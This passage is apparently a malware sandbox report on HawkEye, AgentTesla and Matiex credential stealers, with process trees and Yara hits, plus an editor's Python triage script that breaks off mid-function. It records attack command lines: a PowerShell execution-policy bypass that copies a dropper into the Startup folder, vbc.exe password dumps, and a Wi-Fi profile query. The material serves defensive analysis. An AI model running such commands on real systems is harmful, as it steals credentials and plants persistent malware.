• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.271788096.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.283633869.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 08:51:47
Start date: 02/02/2021
Path: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
Imagebase: 0x2f0000
File size: 532992 bytes
MD5 hash: FFDB58533D5D1362E896E96FB6F02A95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.398436711.0000000007540000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.398332656.00000000073F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:08:51:48
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                                                                                                  Imagebase:0xc30000
                                                                                                  File size:221696 bytes
                                                                                                  MD5 hash:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.445463818.0000000000C32000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.273140883.0000000000C32000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 43%, Metadefender
                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:08:51:51
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                                                                                                  Imagebase:0xf70000
                                                                                                  File size:455680 bytes
                                                                                                  MD5 hash:80C61B903400B534858D047DD0919F0E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000008.00000002.681623451.0000000000F72000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 46%, Metadefender
                                                                                                  • Detection: 89%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:08:51:52
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                                                                                                  Imagebase:0xe0000
                                                                                                  File size:220672 bytes
                                                                                                  MD5 hash:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.430720019.00000000000E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.281843308.00000000000E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 43%, Metadefender
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:08:51:54
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:dw20.exe -x -s 2164
                                                                                                  Imagebase:0x10000000
                                                                                                  File size:33936 bytes
                                                                                                  MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:08:51:57
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000002.296594780.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:08:51:58
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.308131659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:08:52:03
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996
                                                                                                  Imagebase:0xb60000
                                                                                                  File size:434592 bytes
                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:08:52:33
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'netsh' wlan show profile
                                                                                                  Imagebase:0x13c0000
                                                                                                  File size:82944 bytes
                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:08:52:33
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:08:52:43
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                                                                                                  Imagebase:0xa20000
                                                                                                  File size:1655808 bytes
                                                                                                  MD5 hash:59D7D8D5DD3E0055E7C0DCC75897F569
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 20%, ReversingLabs

General

Start time: 08:52:50
Start date: 02/02/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Imagebase: 0x13c0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 08:52:51
Start date: 02/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 08:52:53
Start date: 02/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase: 0x770000
File size: 64616 bytes
MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.414221299.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.418225668.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.418385560.000000000372B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.427152213.00000000039C1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.428390015.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.419784850.000000000372B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.413803172.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.424187770.000000000372B000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 08:52:55
Start date: 02/02/2021
Path: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
Imagebase: 0xa40000
File size: 532992 bytes
MD5 hash: FFDB58533D5D1362E896E96FB6F02A95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001B.00000002.651684392.0000000007F40000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001B.00000002.651227274.0000000007C90000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

General

Start time: 08:52:56
Start date: 02/02/2021
Path: C:\Users\user\AppData\Local\Temp\origigoods40.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
Imagebase: 0xe20000
File size: 221696 bytes
MD5 hash: AE36F0D16230B9F41FFECBD3C5B1D660
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000000.419299258.0000000000E22000.00000002.00020000.sdmp, Author: Joe Security

General

Start time: 08:52:57
Start date: 02/02/2021
Path: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
Imagebase: 0xbd0000
File size: 455680 bytes
MD5 hash: 80C61B903400B534858D047DD0919F0E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001E.00000002.681849072.0000000000BD2000.00000002.00020000.sdmp, Author: Joe Security

General

Start time: 08:52:57
Start date: 02/02/2021
Path: C:\Users\user\AppData\Local\Temp\origigoods20.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
Imagebase: 0x720000
File size: 220672 bytes
MD5 hash: 61DC57C6575E1F3F2AE14C1B332AD2FB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.681903640.0000000000722000.00000002.00020000.sdmp, Author: Joe Security

General

Start time: 08:53:04
Start date: 02/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit): true
Commandline: dw20.exe -x -s 2092
Imagebase: 0x10000000
File size: 33936 bytes
MD5 hash: 8D10DA8A3E11747E51F23C882C22BBC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 08:53:06
Start date: 02/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.446713470.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 08:53:07
Start date: 02/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000023.00000002.465758929.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 08:53:14
Start date: 02/02/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940
Imagebase: 0xb60000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
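
The process entries above carry the whole infection chain in their command lines and dump names: a PowerShell started with -ExecutionPolicy Bypass that Copy-Items the Startup-folder dropper onto its own path, RegAsm.exe launched with no arguments whose HawkEye/Matiex/MailPassView hits sit at 0x403000 in a PAGE_EXECUTE_READWRITE region far below its reported 0x770000 image base (the hollowed payload), two vbc.exe instances running /stext into holdermail.txt and holderwb.txt (the NirSoft MailPassView and WebBrowserPassView recovery tools that HawkEye embeds), and a WerFault.exe whose HawkEye hits come from the memory of the crashed process it was started for (-p 5440) rather than from WerFault being infected. The script below, an example added by the editor and not Joe Sandbox code, turns those observations into repeatable checks over a hand-constructed subset of the entries on this page. It assumes that the .sdmp name is laid out as pid.dumptype.sequence.address.protection.type, that the protection field carries the Win32 PAGE_* value (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE, 0x02 = PAGE_READONLY), that a hit more than 1 MiB from the reported image base is "outside" the image, and that the list of hollowing hosts is the editor's, not the report's.

```python
"""Triage helpers for the process entries of a Joe Sandbox report.

Added example by the editor, not Joe Sandbox code. REPORT below is a
hand-constructed subset of the entries on this page. Assumptions: the .sdmp
name layout is pid.dumptype.sequence.address.protection.type, its protection
field carries the Win32 PAGE_* value, and a Yara hit more than 1 MiB from the
process's reported image base counts as "outside" the image.
"""
import re
from dataclasses import dataclass, field

SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)
PAGE_EXECUTE_READWRITE = 0x40   # assumed meaning of the 5th .sdmp field
IMAGE_WINDOW = 0x100000         # assumption: 1 MiB above the image base still counts as the image
STARTUP_DIR = "\\start menu\\programs\\startup\\"
# .NET utilities commonly abused as hollowing hosts (editor's list, not from the report)
HOLLOWING_HOSTS = {"regasm.exe", "regsvcs.exe", "vbc.exe", "msbuild.exe", "installutil.exe"}


@dataclass
class Proc:
    pid: int                    # PID index used in .sdmp names (0 = not shown on the page)
    path: str
    imagebase: int
    cmdline: str
    yara_sources: list = field(default_factory=list)


def parse_sdmp(name):
    """Split a Joe Sandbox dump name into integer fields; ValueError otherwise."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError("not a Joe Sandbox dump name: %s" % name)
    return {k: int(v, 10 if k == "seq" else 16) for k, v in m.groupdict().items()}


def triage(proc):
    """Return sorted, de-duplicated findings for one process entry."""
    findings = []
    exe = proc.path.rsplit("\\", 1)[-1].lower()
    cl = proc.cmdline.lower()

    if exe == "powershell.exe" and "-executionpolicy bypass" in cl:
        findings.append("execution policy bypass")
        if STARTUP_DIR in cl:
            findings.append("writes to Startup folder (persistence)")

    if exe == "vbc.exe" and "/stext" in cl:
        findings.append("vbc.exe /stext: NirSoft-style password dump to a text file")

    # A .NET utility started with no arguments at all is a classic hollowing host.
    if exe in HOLLOWING_HOSTS and proc.cmdline.strip().strip("'\"").lower() == proc.path.lower():
        findings.append("%s launched without arguments (hollowing host)" % exe)

    if exe == "werfault.exe":
        m = re.search(r"-p\s+(\d+)", proc.cmdline)
        if m:
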